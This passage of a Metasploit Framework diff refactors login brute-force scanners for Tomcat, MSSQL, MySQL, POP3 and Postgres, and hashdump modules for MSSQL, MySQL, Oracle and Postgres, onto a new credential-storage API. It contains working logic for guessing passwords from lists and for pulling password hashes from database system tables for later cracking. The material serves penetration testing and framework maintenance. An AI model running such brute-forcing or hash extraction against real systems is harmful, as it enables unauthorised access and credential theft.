-    each_user_pass { |user, pass|
-      do_login(user, pass)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::Tomcat.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: 10
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: (ssl ? 'https' : 'http'),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
     }
-  end
 
-  def do_login(user='tomcat', pass='tomcat')
-    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
-    success = false
-    srvhdr = '?'
-    uri = normalize_uri(datastore['URI'])
-    begin
-      res = send_request_cgi({
-        'uri'     => uri,
-        'method'  => 'GET',
-        'username' => user,
-        'password' => pass
-        }, 25)
-      unless (res.kind_of? Rex::Proto::Http::Response)
-        vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
-        return :abort
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            username: result.credential.public
+        }
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
-      return :abort if (res.code == 404)
-      srvhdr = res.headers['Server']
-      if res.code == 200
-        # Could go with res.headers['Server'] =~ /Apache-Coyote/i
-        # as well but that seems like an element someone's more
-        # likely to change
-        success = true if(res.body.scan(/Tomcat/i).size >= 5)
-        success
-      end
-
-    rescue ::Rex::ConnectionError => e
-      vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
-      return :abort
-    end
-
-    if success
-      print_good("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] successful login '#{user}' : '#{pass}'")
-      report_auth_info(
-        :host => rhost,
-        :port => rport,
-        :sname => (ssl ? 'https' : 'http'),
-        :user => user,
-        :pass => pass,
-        :proof => "WEBAPP=\"Tomcat Application Manager\"",
-        :source_type => "user_supplied",
-        :duplicate_ok => true,
-        :active => true
-      )
-
-      return :next_user
-    else
-      vprint_error("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
-      return
     end
   end
+
 end
diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
index a31c2637c6..f5da77dd1c 100644
--- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
@@ -35,17 +35,57 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'mssql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        module_fullname: self.fullname,
+        origin_type: :service,
+        private_data: datastore['PASSWORD'],
+        private_type: :password,
+        username: datastore['USERNAME']
+    }
+
+    if datastore['USE_WINDOWS_AUTHENT']
+      credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+      credential_data[:realm_value] = datastore['DOMAIN']
+    end
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }
+    login_data.merge!(service_data)
+
+    is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]
+
+    unless is_sysadmin == 0
+      login_data[:access_level] = 'admin'
+    end
+
+    create_credential_login(login_data)
+
     #Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
     instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
     print_status("Instance Name: #{instancename.inspect}")
     version = mssql_query(mssql_sql_info())[:rows][0][0]
     version_year = version.split('-')[0].slice(/\d\d\d\d/)
 
-    mssql_hashes = mssql_hashdump(version_year)
-    unless mssql_hashes.nil?
-      report_hashes(mssql_hashes,version_year)
+    unless is_sysadmin == 0
+      mssql_hashes = mssql_hashdump(version_year)
+      unless mssql_hashes.nil?
+        report_hashes(mssql_hashes,version_year)
+      end
     end
-
   end
 
 
@@ -55,10 +95,12 @@ class Metasploit3 < Msf::Auxiliary
 
     case version_year
     when "2000"
-      hashtype = "mssql.hashes"
+      hashtype = "mssql"
 
     when "2005", "2008"
-      hashtype = "mssql05.hashes"
+      hashtype = "mssql05"
+    when "2012", "2014"
+      hashtype = "mssql12"
     end
 
     this_service = report_service(
@@ -74,15 +116,42 @@ class Metasploit3 < Msf::Auxiliary
       'Columns' => ['Username', 'Hash']
     )
 
-    hash_loot=""
+    service_data = {
+        address: ::Rex::Socket.getaddress(rhost,true),
+        port: rport,
+        service_name: 'mssql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
     mssql_hashes.each do |row|
       next if row[0].nil? or row[1].nil?
       next if row[0].empty? or row[1].empty?
+
+      credential_data = {
+          module_fullname: self.fullname,
+          origin_type: :service,
+          private_type: :nonreplayable_hash,
+          private_data: "0x#{row[1]}",
+          username: row[0],
+          jtr_format: hashtype
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
       tbl << [row[0], row[1]]
       print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}")
     end
-    filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt"
-    store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service)
   end
 
   #Grabs the user tables depending on what Version of MSSQL
@@ -99,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
     when "2000"
       results = mssql_query(mssql_2k_password_hashes())[:rows]
 
-    when "2005", "2008"
+    when "2005", "2008", "2012", "2014"
       results = mssql_query(mssql_2k5_password_hashes())[:rows]
     end
 
diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb
index 93c62447fc..30a5601d83 100644
--- a/modules/auxiliary/scanner/mssql/mssql_login.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_login.rb
@@ -5,7 +5,8 @@
 
 
 require 'msf/core'
-
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/mssql'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -30,44 +31,82 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")
-    each_user_pass { |user, pass|
-      do_login(user, pass, datastore['VERBOSE'])
+
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+        realm: datastore['DOMAIN']
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::MSSQL.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: 30,
+        windows_authentication: datastore['USE_WINDOWS_AUTHENT']
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'mssql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
     }
-    # The service should already be reported at this point courtesy of
-    # report_auth_info, but this is currently the only way to give it a
-    # name.
-    report_service({
-      :host => rhost,
-      :port => rport,
-      :proto => 'tcp',
-      :name => 'mssql'
-    })
-  end
 
-  def do_login(user='sa', pass='', verbose=false)
-    vprint_status("#{rhost}:#{rport} - MSSQL - Trying username:'#{user}' with password:'#{pass}'")
-    begin
-      success = mssql_login(user, pass)
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            username: result.credential.public
+        }
 
-      if (success)
-        print_good("#{rhost}:#{rport} - MSSQL - successful login '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => 'mssql',
-          :user => user.downcase,
-          :pass => pass,
-          :source_type => "user_supplied",
-          :active => true
-        )
-        return :next_user
+        if datastore['USE_WINDOWS_AUTHENT']
+          credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+          credential_data[:realm_value] = result.credential.realm
+        end
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
       else
-        vprint_error("#{rhost}:#{rport} failed to login as '#{user}'")
-        return
+        login_data = {
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status
+        }
+        if datastore['USE_WINDOWS_AUTHENT']
+          login_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+          login_data[:realm_value] = result.credential.realm
+        end
+        invalidate_login(login_data)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} connection failed")
-      return :abort
     end
   end
+
 end
diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
index e249db4ff0..f213e8e428 100644
--- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
@@ -30,6 +30,35 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'mysql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        module_fullname: self.fullname,
+        origin_type: :service,
+        private_data: datastore['PASSWORD'],
+        private_type: :password,
+        username: datastore['USERNAME']
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }
+    login_data.merge!(service_data)
+
+    create_credential_login(login_data)
+
     #Grabs the username and password hashes and stores them as loot
     res = mysql_query("SELECT user,password from mysql.user")
     if res.nil?
@@ -37,41 +66,41 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    this_service = report_service(
-          :host  => datastore['RHOST'],
-          :port => datastore['RPORT'],
-          :name => 'mysql',
-          :proto => 'tcp'
-          )
+    service_data = {
+      address: ::Rex::Socket.getaddress(rhost,true),
+      port: rport,
+      service_name: 'mysql',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
 
+    credential_data = {
+        origin_type: :service,
+        jtr_format: 'mysql,mysql-sha1',
+        module_fullname: self.fullname,
+        private_type: :nonreplayable_hash
+    }
 
-    #create a table to store data
-    tbl = Rex::Ui::Text::Table.new(
-      'Header'  => 'MysQL Server Hashes',
-      'Indent'   => 1,
-      'Columns' => ['Username', 'Hash']
-    )
+    credential_data.merge!(service_data)
 
     if res.size > 0
       res.each do |row|
-        tbl << [row[0], row[1]]
+        credential_data[:username]     = row[0]
+        credential_data[:private_data] = row[1]
         print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
+        credential_core = create_credential(credential_data)
+        login_data = {
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+        login_data.merge!(service_data)
+        create_credential_login(login_data)
       end
     end
 
-    report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
-
-
   end
 
-  #Stores the Hash Table as Loot for Later Cracking
-  def report_hashes(hash_loot,service)
 
-    filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_mysqlhashes.txt"
-    path = store_loot("mysql.hashes", "text/plain", datastore['RHOST'], hash_loot, filename, "MySQL Hashes",service)
-    print_status("Hash Table has been saved: #{path}")
-
-  end
 
 
 end
diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb
index b034b1d00a..8d7b4f4563 100644
--- a/modules/auxiliary/scanner/mysql/mysql_login.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_login.rb
@@ -5,7 +5,8 @@
 
 
 require 'msf/core'
-
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/mysql'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -36,9 +37,69 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
     begin
       if mysql_version_check("4.1.1") # Pushing down to 4.1.1.
-        each_user_pass { |user, pass|
-          do_login(user, pass)
+        cred_collection = Metasploit::Framework::CredentialCollection.new(
+            blank_passwords: datastore['BLANK_PASSWORDS'],
+            pass_file: datastore['PASS_FILE'],
+            password: datastore['PASSWORD'],
+            user_file: datastore['USER_FILE'],
+            userpass_file: datastore['USERPASS_FILE'],
+            username: datastore['USERNAME'],
+            user_as_pass: datastore['USER_AS_PASS'],
+        )
+
+        scanner = Metasploit::Framework::LoginScanner::MySQL.new(
+            host: ip,
+            port: rport,
+            proxies: datastore['PROXIES'],
+            cred_details: cred_collection,
+            stop_on_success: datastore['STOP_ON_SUCCESS'],
+            connection_timeout: 30
+        )
+
+        service_data = {
+            address: ip,
+            port: rport,
+            service_name: 'mysql',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
         }
+
+        scanner.scan! do |result|
+          if result.success?
+            credential_data = {
+                module_fullname: self.fullname,
+                origin_type: :service,
+                private_data: result.credential.private,
+                private_type: :password,
+                username: result.credential.public
+            }
+            credential_data.merge!(service_data)
+
+            credential_core = create_credential(credential_data)
+
+            login_data = {
+                core: credential_core,
+                last_attempted_at: DateTime.now,
+                status: Metasploit::Model::Login::Status::SUCCESSFUL
+            }
+            login_data.merge!(service_data)
+
+            create_credential_login(login_data)
+            print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+          else
+            invalidate_login(
+                address: ip,
+                port: rport,
+                protocol: 'tcp',
+                public: result.credential.public,
+                private: result.credential.private,
+                realm_key: nil,
+                realm_value: nil,
+                status: result.status)
+            print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+          end
+        end
+
       else
         print_error "#{target} - Unsupported target version of MySQL detected. Skipping."
       end
@@ -98,36 +159,6 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-  def do_login(user='', pass='')
 
-    vprint_status("#{rhost}:#{rport} Trying username:'#{user}' with password:'#{pass}'")
-    begin
-      m = mysql_login(user, pass)
-      return :fail if not m
-
-      print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN '#{user}' : '#{pass}'")
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'mysql',
-        :user   => user,
-        :pass   => pass,
-        :source_type => "user_supplied",
-        :active => true
-      )
-      return :next_user
-
-    rescue ::RbMysql::Error => e
-      vprint_error("#{rhost}:#{rport} failed to login: #{e.class} #{e}")
-      return :error
-
-    rescue ::Interrupt
-      raise $!
-
-    rescue ::Rex::ConnectionError
-      return :abort
-
-    end
-  end
 
 end
diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb
index d23f8d88a8..8c14bbcf42 100644
--- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb
+++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description'    => %Q{
           This module dumps the usernames and password hashes
           from Oracle given the proper Credentials and SID.
-          These are then stored as loot for later cracking.
+          These are then stored as creds for later cracking.
       },
       'Author'         => ['theLightCosine'],
       'License'        => MSF_LICENSE
@@ -91,23 +91,47 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
     print_status("Hash table :\n #{tbl}")
-    report_hashes(tbl.to_csv, is_11g, ip, this_service)
+    report_hashes(tbl, is_11g, ip, this_service)
   end
 
 
 
-  def report_hashes(hash_loot, is_11g, ip, service)
+  def report_hashes(table, is_11g, ip, service)
     #reports the hashes slightly differently depending on the version
     #This is so that we know which are which when we go to crack them
     if is_11g==false
-      filename= "#{ip}-#{datastore['RPORT']}_oraclehashes.txt"
-      store_loot("oracle.hashes", "text/plain", ip, hash_loot, filename, "Oracle Hashes", service)
-      print_status("Hash Table has been saved")
+      jtr_format = "des"
     else
-      filename= "#{ip}-#{datastore['RPORT']}_oracle11ghashes.txt"
-      store_loot("oracle11g.hashes", "text/plain", ip, hash_loot, filename, "Oracle 11g Hashes", service)
-      print_status("Hash Table has been saved")
+      jtr_format = "raw-sha1"
     end
+    service_data = {
+      address: Rex::Socket.getaddress(ip),
+      port: service[:port],
+      protocol: service[:proto],
+      service_name: service[:name],
+      workspace_id: myworkspace_id
+    }
+
+    table.rows.each do |row|
+      credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        username: row[0],
+        private_data: row[1],
+        private_type: :nonreplayable_hash,
+        jtr_format: jtr_format
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
+    end
+    print_status("Hash Table has been saved")
   end
 
 
diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb
index fa04ff718a..707854948b 100644
--- a/modules/auxiliary/scanner/pop3/pop3_login.rb
+++ b/modules/auxiliary/scanner/pop3/pop3_login.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/login_scanner/pop3'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -51,76 +52,80 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    begin
-      print_status("Connecting to #{target}")
-      each_user_pass do |user, pass|
-        do_login(user, pass)
-      end
-    end
-    rescue ::Rex::ConnectionError
-    rescue ::Exception => e
-      vprint_error("#{target} #{e.to_s} #{e.backtrace}")
-  end
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS'],
+    )
 
-  def pop3_send(data=nil, con=true)
-    begin
-      @result=''
-      @coderesult=''
-      if (con)
-        @connected=false
-        connect
-        select(nil,nil,nil,0.4)
+    scanner = Metasploit::Framework::LoginScanner::POP3.new(
+      host: ip,
+      port: rport,
+      ssl: datastore['SSL'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+    )
+
+    scanner.scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+        do_report(result)
+        next
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}', '#{result.proof.to_s.chomp}'"
       end
-      @connected=true
-      sock.put(data)
-      @result=sock.get_once
-    rescue ::Exception => err
-      print_error("Error: #{err.to_s}")
+
+      # If we got here, it didn't work
+      invalidate_login(
+        address: ip,
+        port: rport,
+        protocol: 'tcp',
+        public: result.credential.public,
+        private: result.credential.private,
+        realm_key: result.credential.realm_key,
+        realm_value: result.credential.realm,
+        status: result.status
+      )
     end
   end
 
-  def do_login(user=nil,pass=nil)
-    begin
-      pop3_send(nil,true) # connect Only
-      if @result !~ /^\+OK (.*)/
-        print_error("POP3 server does not appear to be running")
-        return :abort
-      end
-
-      vprint_status("#{target} - Trying user:'#{user}' with password:'#{pass}'")
-      cmd = "USER #{user}\r\n"
-      pop3_send(cmd,!@connected)
-      if @result !~ /^\+OK (.*)/
-        vprint_error("#{target} - Rejected user: '#{user}'")
-        return :fail
-      else
-        cmd = "PASS #{pass}\r\n"
-        pop3_send(cmd,!@connected)
-        if @result !~ /^\+OK (.*)/
-          vprint_error("#{target} - Failed login for '#{user}' : '#{pass}'")
-          if (@connected)
-            disconnect # Some servers disconnect the client after wrongs attempts
-            @connected = false
-          end
-          return :fail
-        else
-          print_good("#{target} - SUCCESSFUL login for '#{user}' : '#{pass}'")
-          report_auth_info(
-            :host => rhost,
-            :port => rport,
-            :sname => 'pop3',
-            :user => user,
-            :pass => pass,
-            :source_type => "user_supplied",
-            :active => true
-          )
-          disconnect
-          @connected = false
-          return :next_user
-        end
-      end
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE
-    end
+  def service_name
+    datastore['SSL'] ? 'pop3s' : 'pop3'
   end
+
+  def do_report(result)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: service_name,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 end
diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb
index 93360ff4fb..f1079b15ed 100644
--- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb
@@ -35,12 +35,42 @@ class Metasploit3 < Msf::Auxiliary
     #Query the Postgres Shadow table for username and password hashes and report them
     res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
 
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'postgres',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        module_fullname: self.fullname,
+        origin_type: :service,
+        private_data: datastore['PASSWORD'],
+        private_type: :password,
+        username: datastore['USERNAME'],
+        realm_key:  Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
+        realm_value: datastore['DATABASE']
+    }
+
+    credential_data.merge!(service_data)
+
     #Error handling routine here, borrowed heavily from todb
     case res.keys[0]
     when :conn_error
       print_error("A Connection Error occured")
       return
     when :sql_error
+      # We know the credentials worked but something else went wrong
+      credential_core = create_credential(credential_data)
+      login_data = {
+          core: credential_core,
+          last_attempted_at: DateTime.now,
+          status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
       case res[:sql_error]
       when /^C42501/
         print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - Insufficient permissions."
@@ -50,15 +80,19 @@ class Metasploit3 < Msf::Auxiliary
         return
       end
     when :complete
+      credential_core = create_credential(credential_data)
+      login_data = {
+          core: credential_core,
+          last_attempted_at: DateTime.now,
+          status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+      login_data.merge!(service_data)
+      # We know the credentials worked and have admin access because we got the hashes
+      login_data[:access_level] = 'Admin'
+      create_credential_login(login_data)
       print_status("Query appears to have run successfully")
     end
 
-    this_service = report_service(
-          :host  => datastore['RHOST'],
-          :port => datastore['RPORT'],
-          :name => 'postgres',
-          :proto => 'tcp'
-          )
 
     tbl = Rex::Ui::Text::Table.new(
       'Header'  => 'Postgres Server Hashes',
@@ -66,6 +100,22 @@ class Metasploit3 < Msf::Auxiliary
       'Columns' => ['Username', 'Hash']
     )
 
+    service_data = {
+        address: ::Rex::Socket.getaddress(rhost,true),
+        port: rport,
+        service_name: 'postgres',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        jtr_format: 'raw-md5,postgres',
+        module_fullname: self.fullname,
+        private_type: :nonreplayable_hash
+    }
+
+    credential_data.merge!(service_data)
 
 
     res[:complete].rows.each do |row|
@@ -73,23 +123,24 @@ class Metasploit3 < Msf::Auxiliary
       next if row[0].empty? or row[1].empty?
       password = row[1]
       password.slice!(0,3)
+
+      credential_data[:username]     = row[0]
+      credential_data[:private_data] = password
+
+      credential_core = create_credential(credential_data)
+      login_data = {
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+      }
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
       tbl << [row[0], password]
     end
     print_good("#{tbl.to_s}")
-    report_hash(tbl.to_csv,this_service)
-
 
   end
 
-  #Reports the Stolen Hashes back to the Database for later cracking
-  def report_hash(hashtable,service)
-    filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
-    path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
-    print_status("Hash Table has been saved: #{path}")
-
-  end
-
-
 
 
 end
diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb
index 91bc0559cb..01d6ee32c2 100644
--- a/modules/auxiliary/scanner/postgres/postgres_login.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_login.rb
@@ -4,7 +4,8 @@
 ##
 
 require 'msf/core'
-
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/postgres'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -48,11 +49,72 @@ class Metasploit3 < Msf::Auxiliary
   # Loops through each host in turn. Note the current IP address is both
   # ip and datastore['RHOST']
   def run_host(ip)
-      each_user_pass { |user, pass|
-        datastore['USERNAME'] = user
-        datastore['PASSWORD'] = pass
-        do_login(user,pass)
-      }
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+        realm: datastore['DATABASE']
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::Postgres.new(
+      host: ip,
+      port: rport,
+      proxies: datastore['PROXIES'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 30
+    )
+
+    service_data = {
+      address: ip,
+      port: rport,
+      service_name: 'postgres',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+          module_fullname: self.fullname,
+          origin_type: :service,
+          private_data: result.credential.private,
+          private_type: :password,
+          realm_key: Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
+          realm_value: result.credential.realm,
+          username: result.credential.public
+        }
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
+            realm_value: result.credential.realm,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+      end
+    end
+
   end
 
   # Alias for RHOST
@@ -65,66 +127,6 @@ class Metasploit3 < Msf::Auxiliary
     datastore['RPORT']
   end
 
-  # Actually do all the login stuff. Note that "verbose" is really pretty
-  # verbose, since postgres_login also makes use of the verbose value
-  # to print diagnostics for other modules.
-  def do_login(user=nil,pass=nil)
-    database = datastore['DATABASE']
-    begin
-      msg = "#{rhost}:#{rport} Postgres -"
